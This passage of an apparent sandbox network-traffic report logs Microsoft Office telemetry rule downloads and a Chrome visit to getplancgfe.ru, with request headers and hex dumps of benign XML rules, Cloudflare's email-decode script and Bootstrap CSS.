                                                                                        2024-11-01 12:46:55 UTC141INData Raw: 0d 0a 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                        Data Ascii: </footer><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></html>
                                                                                        2024-11-01 12:46:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        92192.168.2.44985213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 411
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989AF051"
                                                                                        x-ms-request-id: 48ab1ac5-a01e-0070-1038-2c573b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124654Z-16ccfc49897774xmhC1DFWuraw00000000kg000000002kyf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        93192.168.2.44985313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 470
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                        x-ms-request-id: 24f20e23-801e-0078-0539-2bbac6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124654Z-16dc884887bkpzdnhC1DFWbc3n00000000r0000000004qv4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        94192.168.2.44985613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:55 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB556A907"
                                                                                        x-ms-request-id: 464d676d-e01e-0020-7f08-2cde90000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124655Z-16ccfc49897rwhbvhC1DFWx88g00000000gg0000000024hc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        95192.168.2.449854104.21.8.814435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC576OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://getplancgfe.ru//
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:55 UTC748INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: application/javascript
                                                                                        Content-Length: 1239
                                                                                        Connection: close
                                                                                        Last-Modified: Fri, 25 Oct 2024 16:48:41 GMT
                                                                                        ETag: "671bcbe9-4d7"
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6Jfsz0jtYPYfga4pYYHCY2s2c8xlhaQtljTgOweLKuBW5Z0slk02OUOkr7rtQyLWQNJmOlHiTL4xOSAT9iojgqGWspp%2FHAConssHIpm22qiWAwq6W5bbVyTRemxs6MKAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd8c8dad2e19-DFW
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Expires: Sun, 03 Nov 2024 12:46:55 GMT
                                                                                        Cache-Control: max-age=172800
                                                                                        Cache-Control: public
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC621INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                        Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                        2024-11-01 12:46:55 UTC618INData Raw: 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72
                                                                                        Data Ascii: l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.quer


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        96192.168.2.44985713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:55 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 502
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                        x-ms-request-id: 0f887529-101e-008e-7312-2ccf88000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124655Z-176bd8f9bc5pzj8phC1DFWsz3000000000pg000000000x31
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        97192.168.2.44985813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:55 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                        x-ms-request-id: dd9de73b-201e-00aa-8011-2c3928000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124655Z-176bd8f9bc5zzwfdhC1DFWqpb400000000r0000000000w3v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        98192.168.2.44985913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:55 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                        x-ms-request-id: a77738ad-c01e-0066-3708-2ca1ec000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124655Z-16ccfc498974624whC1DFWdg3800000000bg000000001ma7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        99192.168.2.44986013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:55 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:55 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                        x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124655Z-16ccfc49897vgjnwhC1DFWbx9800000000m0000000000v3m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:55 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        100192.168.2.449863151.101.193.2294435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC574OUTGET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1
                                                                                        Host: cdn.jsdelivr.net
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://getplancgfe.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:56 UTC762INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 232914
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: *
                                                                                        Timing-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Content-Type: text/css; charset=utf-8
                                                                                        X-JSD-Version: 5.3.0
                                                                                        X-JSD-Version-Type: version
                                                                                        ETag: W/"38dd2-sjFlHg/Wi72HWBifvTZCxGLTT6Y"
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Age: 873524
                                                                                        X-Served-By: cache-fra-eddf8230088-FRA, cache-dfw-kdfw8210051-DFW
                                                                                        X-Cache: HIT, HIT
                                                                                        Vary: Accept-Encoding
                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                        2024-11-01 12:46:56 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 20 76 35 2e 33 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 33 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 2c 5b 64 61 74 61 2d 62 73 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36
                                                                                        Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.3.0 (https://getbootstrap.com/) * Copyright 2011-2023 The Bootstrap Authors * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#66
